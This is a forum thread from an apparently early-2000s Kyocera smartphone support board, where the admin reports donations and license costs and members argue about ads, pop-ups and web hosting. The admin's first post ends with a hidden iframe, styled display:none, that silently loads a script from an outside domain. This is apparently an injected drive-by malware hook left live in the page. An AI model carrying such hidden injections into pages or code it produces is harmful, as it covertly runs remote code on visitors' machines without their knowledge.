+ Reply to Thread
Page 1 of 2 1 2 LastLast

Upgrades & Donations

To answer some questions:

On the donation subject that had been discussed while we were gone. Yes, we have to this date received 3 donations. They are as follows:
    1st- $5.00 2nd - $10.00 3rd - $5.00
    So, that definitely didn't pay our way on vacation.

In order to upgrade the board yesterday, we paid $160.00 to Jelsoft for an "Owned license" to vBulletin. Previously we did not have the "owned version" but had paid a retailer for a leased version. $160 is a large sum to pay on top of the bandwidth we pay for monthly to keep the site up. Once the 7135 comes out, we will experience increased bandwidth usage, and may have to pay an even higher monthly fee. We would like to keep the site free from advertising, but should we have to go down that road, we will try and make it as unobtrusive as possible.

Thanks to all those who have donated, any help is always greatly appreciated, there is a PayPal donate button on the bottom of the page.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    --Jazz--

Re: Upgrades & Donations

We would like to keep the site free from advertising, but should we have to go down that road, we will try and make it as unobtrusive as possible.
    Why? We're used to it, it isn't going to hurt us. Please market the board as much as you can.
    I'm sure the people at x10, netflix, etc would love to take a look at your bandwidth. Graphical banners, text links, background popups... they're all ok. Where it gets annoying is a floating window going across the browser that doesn't let you continue untill it stops. Like Mark Haines once said on Squawk Box "I'm aware of 'clutter' around the edges, but it doesn't get my attention". Just so, we're here to focus on the 7135 and a little clutter isn't going to cause us to loose our focus.

Thanks to all those who have donated, any help is always greatly appreciated, there is a PayPal donate button on the bottom of the page.
    I will as soon as yall impliment a mobile format like this http://mobilediscussion.treocentral.com/tcforum/ for smartphonesource.

Re: Re: Upgrades & Donations

Originally posted by David Westman
    ...background popups... they're all ok.
    Speak for yourself.

Oh When that Shark Bites! LBOCEAN's Avatar
    Yeah, i'm not cool with the ad thing either. I get enough of it just from regular browsing, I would prefer to have one part of the net that's safe, that keeps me sane.

Get it ? Safe/Sane

poop out...

pop-ups/unders
    iBug
    mac osx usernew beetle pilotpowerbook operatorsmartphone communicator

Administrator
    it would not hurt to have a link to a banner ad at the top of the board for us to link to. especially any place that sell pda related stuff, accessory sites. things like would probably be fine with cirtualluy all.

you can post a link at the top without any pop unders/overs, wihch is probably the most annoyance to the people. i know bandwdith is $$$...

Basically there isn't an alternative for the best support site for kyo smartphones so if a measly background pop-up is going to run people off, so be it. They'll be back.

When I got my 6035 I followed:

alt.cellular.verizon
    alt.cellular.sprintpcs
    comp.sys.palmtops.pilot
    alt.comp.sys.palmtops.pilot

doing a search for "6035" each day. Wasn't pretty, but it worked. This board has been a godsend. Never went back to the newsgroups.

1) learned about the "address book not updating bug" which was fixed by software and update images I got from this board
    2) learned about the outbound mail server for sending mail
    3) learned the DNS number to plug in when I was having problems connecting to qnc one time.
    99) even learned a new way to make a graffiti 'y' that works every time.

For anyone griping about pop ups (a one time event when entering or leaving the board) I say put your money where your fingers are. Register a domain, buy the software, and pay monthly (not one time only) hosting fees. In fido net382 there was ALWAYS cost sharing. Course the newbies and points wanted echomail for free, but having one NC/NEC making a nightly long distance call to the RC/REC for the mail was too expensive for one person.

There would be no fair way to do a cost recovery plan for smartphone source. That would entail subscriptions which would turn off newbies. Advertising would be preferable.

Furthermore, if pop-ups are so bothersome, download some software that blocks them, or activate it in your norton internet security 2002. Now that I know what the donations have been up to this point, I find the gimme attitude loathsome. Some actually expect JimmyJoe to provide an internet oasis out of the kindness of his heart like he's independantly wealthy. We're all hurting these days financially for one reason or another. As well as paying for everything (minus the what $25?) and configuring everything he's probably too tired to follow every post like many of us do so we actually get more benefit of the communal knowledge than he does!

(continuing filibuster) so again I say, what are the options? PDAbuzz.com where the posts for all palmOS smartphones are in one forum? newsgroups where most of the posts don't apply? I have no problem pressing the alt-4 key, or even faster, as soon as I see the broswer on the taskbar I right click and delete it before it loads. As long as it doesn't hinder productivity I'm cool with it (even though I'm apparently in a minority of one). tvguide.com has a gotcha where if your mouse goes over something it drops down a big ad covering station listings, but I have learned to avoid that area. I'm sure some will comment something to the effect like "gee, make one anti-ad comment and Mr. Westman starts flaming". Well, how about getting twelve people who read this board religiously to each make one hosting payment/yr. I don't think it should cost JimmyJoe anything as he's already provided the time to set it up. That would be one way to avoid advertising. Will 12 brave souls step up to the plate or not? If it were a matter of JimmyJoe being able to quit his day job and setting up infinite loop popups, then I would be more agreeable that closing 15 windows each time would inhibit my productivity.

AMEN Brother Dave.

Kept my eye out for other boards as well, they just don't compare

So I finally got off the pot and showed my support. I'm curious though since I have no idea......how much does it cost roughly to run this monthly? Just wondering so others have an idea if they don't want ads, and don't want to make this a mandatory sign up for thing. I can't see why you guys should have to be also putting out the money to run it. Just plain buying the program, let alone keeping it up is more than enough!!
    Thank you so much for this forum!!!!!!!!!

I would suppose the hosting cost depends on bandwidth usage. The site for my work (which is basically just an online billboard) costs $25/month (hosted by Interland) and our bandwidth runs 3-6 gigs /month.

I'd like to learn more about it as when I found that .us domains became available I registered my last name (westman.us). It ain't a dot com, but it's better than nothing. Plus it's patriotic. I'd like to find a cheap host that gives a lotta megs with frontpage extensions, and email host (for example david@westman.us).

patriotism...

I would suppose the hosting cost depends on bandwidth usage. The site for my work (which is basically just an online billboard) costs $25/month (hosted by Interland) and our bandwidth runs 3-6 gigs /month.

I'd like to learn more about it as when I found that .us domains became available I registered my last name (westman.us). It ain't a dot com, but it's better than nothing. Plus it's patriotic. I'd like to find a cheap host that gives a lotta megs with frontpage extensions, and email host (for example david@westman.us).
    thinkAccess offers several great deals for hosting with unlimited transfer.

my company host several sites with them and is very happy.

where did you register the <.us> domain?

thanx
    iBug

Well, how about getting twelve people who read this board religiously to each make one hosting payment/yr. I don't think it should cost JimmyJoe anything as he's already provided the time to set it up. That would be one way to avoid advertising. Will 12 brave souls step up to the plate or not?
    I agree that it shouldn't cost jimmyjoe and jazz anything to run this site. I have contributed to the site and plan to make regular contributions every couple months or so.

As far as pop-up ads go... I occasionally check out the "Howard Forums" and they use pop-ups a LOT, but offer a $3 per month (or $30 per year) subscription to remove all ads. I don't know how much money there is to be made from the ads, but if jimmyjoe and jazz did something like that and offered the "subscription" option, I would have no problem with paying a small fee to subscribe. My guess is that most of us "regulars" would pay, and those that aren't such frequent visitors would not be put off enough by the ads to stop visiting. If 30 people paid $3 per month that would be over $1,000 over the course of a year. I think we have 30 people here who would subscribe, don't we?
    Please visit my picture site: Robert-O-Rama :)

I'd like to find a cheap host that gives a lotta megs with frontpage extensions, and email host
    Check out: Easy CGI

iBUG
    where did you register the <.us> domain?
    Try here: NIC US Domains

I use Dixie Internet Systems for my web hosting. They have good customer service, prices, and features. They provide an inexpensive hosting package through http://www.3-95.com/, which is the one that I have.
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

Hey; Dixie Internet Systems is using the old PHPbb board :p

Originally posted by lbocean
    Hey; Dixie Internet Systems is using the old PHPbb board :p
    Yes, they do. I've never seen a problem with their board though.
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

uncle sam

Check out: Easy CGI

Try here: NIC US Domains
    thanx, dan!

how much does the hosting cost?
    what size/transfer capabilities?
    iBug

You should find all the info on there site.

sorry

You should find all the info on there site.
    oops, i meant for smartphonesource.com
    iBug

Just sent a paypal... Somehow I missed you, but had sent money to Howardforums.com and one other already :o
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16